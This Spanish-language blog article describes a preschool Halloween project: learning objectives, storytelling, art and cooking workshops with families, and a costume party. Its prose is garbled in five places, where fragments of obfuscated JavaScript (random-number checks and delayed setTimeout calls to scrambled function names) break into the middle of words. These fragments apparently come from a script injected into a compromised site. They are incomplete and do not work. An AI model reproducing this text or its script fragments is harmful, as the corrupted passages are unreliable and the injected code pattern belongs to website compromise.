HALLOWEEN LLEGA A LAS AULAS. EXPERIENCIA DIDÁCTICA

Autora: Manuela González Castaño

Es cada vez más común celebrar Halloween, una fiesta frecuente en países anglosajones que se celebra principalmente la noche del 31 de octubre, pero que, poco a poco, se ha popularizado también en otros países, como el nuestro. Por esta razón, se decidió celebrar esta fiesta en nuestro centro de Educación Infantil, porque, además de ser divertido y motivador para los niños, sirve para enseñarles otras culturas diferentes a la nuestra, puesto que hoy día encontramos en nuestras aulas diversidad de nacionalidades y culturas.

En primer lugar, nos propusimos una serie de objetivos, teniendo en cuenta las capacidades del alumnado, sus necesidades e intereses:

  1. Conocer y apreciar Halloween como fiesta típica de otros países y culturas, mostrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando actitudes de interés y respeto.
  2. Desarrollar la imaginación
  3. Promover actitudes y hábitos de colaboración y ayuda entre compañeros.
  4. Desarrollar destrezas manuales y motrices.
  5. Aprender pautas elementales de convivencia y relación social
  6. Integrar a las familias en las diferentes actividades del centro escolar.

En la asamblea les explicamos a los niños la historia de Halloween, sus orígenes, cómo se celebra y cómo íbamos a organizarla entre todos para finalizar con una gran fiesta. Además, les fuimos quitandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el miedo que pudiera existir entre los pequeños hacia los diversos personajes típicos de la fiesta: fantasmas, murciélagos…

Durante una semana, llevamos a cabo varias actividades:

-           En el rincón de arte, elaboramos todo tipo de elementos para decorar: brujas, fantasmas, calabazas, murciélagos, telarañas, guirnaldas, marionetas…todo ello con diferentes materiales de diversas texturas y colores, con la finalidad de que los pequeños vayan adquiriendo conceptos como duro, blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando, suave, áspero, etc. Además, elaboramos caretas y disfraces para vestirnos el día de la gran fiesta: gorros y vestidos de brujas para las niñas y capas de vampiros para los niños.

-                     Taller de cocina: contamos con la colaboración de las familias de los alumnos, que ayudaron a los niños en la preparación de deliciosas tartas con forma de calabaza o serpiente, dulces con forma de araña, brujas dulces, etc. Tanto niños como padres disfrutaron muchísimo y, además, fomentamos la participación de la familia en el aula.


Finalmente, el día de la gran fiesta, todos los niños y niñas se disfrazaron con los trajes que hicieron (también nos tocó a las maestras de infantil meternos en el papel), pudimos disfrutar comiendo las ricas recetas elaboradas en el taller de cocina y luego jugamos a diferentes juegos, como la momia y el baile de la escoba, donde se potenció el juego socializador y cooperativo.

Es una experiencia inolvidable en la que, tanto alumnos como maestros, disfrutamos a lo grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande.


BIBLIOGRAFÍA:

  • Decreto 4/2008, de 11 de enero, por el que se aprueba el Currículo de Educación Infantil para la Comunidad Autónoma de Extremadura, DOE, 18 de enero de 2008, núm.12, p.1226-1272.

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.